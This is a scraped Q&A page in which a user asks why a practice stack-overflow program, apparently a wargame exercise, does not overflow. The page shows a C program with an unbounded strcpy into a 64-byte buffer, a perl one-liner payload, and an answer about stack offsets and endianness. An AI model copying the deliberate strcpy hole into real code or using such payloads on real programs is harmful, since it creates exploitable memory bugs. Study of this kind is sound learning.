I can not overflow buffer
Question
I have seen a buffer overflow code but I can not over flow it. Is there any gcc option to compile that? Or any wrong with that code.
The code is:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argument\n");
}
modified = 0;
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
and I am trying to run it this way:
perl -e 'print "A"x64 . "dcba"' | xargs ./main
1 answers
solution1
1 ACCPTED 2015-04-29 12:17:52
You need to know
- Know the stack memory layout and the address difference between the variable
modifiedandbufferYou can solve it by finding the offset between modified and buffer as(char *)&modified - (char *)buffer - Your machine endianess. I have used the stack overflow answer for this purpose
The linked demonstrates how to run the modified code that serves the purpose of determining the correct argument as well as stack smashing. The first Demo provides you with the argument that you can feed to your second Demo
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.
Related Question
Can `recv()` result in a buffer overflow?
Why am I getting Buffer Overflow? How can I avoid it? [C++]
Can you give an example of a buffer overflow?
How do i fix this buffer overflow issue?
How can i minimize the memory leak/stack-buffer-overflow errors like this?
How can I suppress a stack-buffer-overflow from AddressSanitizer in gcc
can the wcsncpy_s function result in a buffer overflow?
basic C++ (cout buffer or overflow i think?!)
What is a buffer overflow and how do I cause one?
Why am I receiving a heap buffer overflow runtime error
Related Tags